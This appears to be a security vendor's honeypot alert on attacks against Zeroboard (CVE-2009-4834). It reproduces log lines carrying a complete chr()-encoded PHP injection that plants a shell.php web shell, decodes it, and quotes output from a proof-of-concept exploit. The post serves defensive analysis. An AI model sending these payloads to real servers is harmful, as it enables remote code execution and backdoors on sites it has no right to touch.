[Honeypot Alert] Zeroboard now_connect() Remote Code Execution Attacks

Our web honeypots recently identified attacks for CVE-2009-4834 which is a vulnerability within Zeroboard:

123.140.193.150 - - [09/Apr/2012:20:11:19 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304
123.140.193.150 - - [09/Apr/2012:20:11:23 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290
123.140.193.150 - - [09/Apr/2012:20:11:27 +0900] "GET http://host_removed/admin/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 293
123.140.193.150 - - [09/Apr/2012:20:28:41 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304
123.140.193.150 - - [09/Apr/2012:20:28:45 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290
123.140.193.150 - - [09/Apr/2012:20:28:49 +0900] "GET http://host_removed/admin/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 293

The chr( injected code, attempts to execute the following commands:

./shell.php w+ <? system($cmd); ?>

Based on these payloads, the attacker appears to have used a tool similar to this proof of concept script from Exploit-DB:

/*
poc by kyoungchip,jang
email : SpeeDr00t1004@gmail.com
[*] the bug
- http://www.xpressengine.com/15955761
Application
- Zeroboard 4.1 pl7
Reference:
- http://www.nzeo.com
- Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada
[*] Target - My test server
$ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test
- Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test
- Target : http://xxx.xxx.xxx/zboard/bbs/shell.php?cmd=ls
[+] xxx.xxx.xxx connecting ok!
[+] Exploiting zeroboard start - [+] Exploiting success!!
[*] Create Backdoor Start - [+] Create Backdoor success!!
[*] Confirmming your backdoor php script - http://192.168.179.6/zeroboard/zb41pl7/bbs/data/shell.php is generated!
[+] Exploiting success!!
- http://192.168.179.6/zeroboard/bbs/data/shell.php?cmd=ls [+] Execute the websehll script
*/

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.